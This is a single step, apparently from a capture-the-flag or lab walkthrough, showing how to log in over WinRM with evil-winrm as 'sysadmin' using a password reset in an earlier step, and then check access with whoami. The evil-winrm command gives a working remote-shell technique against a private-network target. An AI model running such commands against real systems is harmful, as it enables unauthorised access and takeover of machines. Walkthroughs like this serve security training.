11. Validate New Credentials via WinRM

Now that you've reset the password for sysadmin, you can try to get a remote shell using WinRM.

Test the new credentials over WinRM, a Windows remote shell. This gives full command-line access to the target.

Command:

evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'

✅ If successful:

You’ll get a PowerShell prompt like:

PS C:\Users\sysadmin>

Then type:

whoami

Expected output:

megachange\sysadmin

That confirms full access as sysadmin on the machine .

Previous10. Abuse ForceChangePassword Right via RPCNext12. Enumerate Local Privileges and AutoLogon

Last updated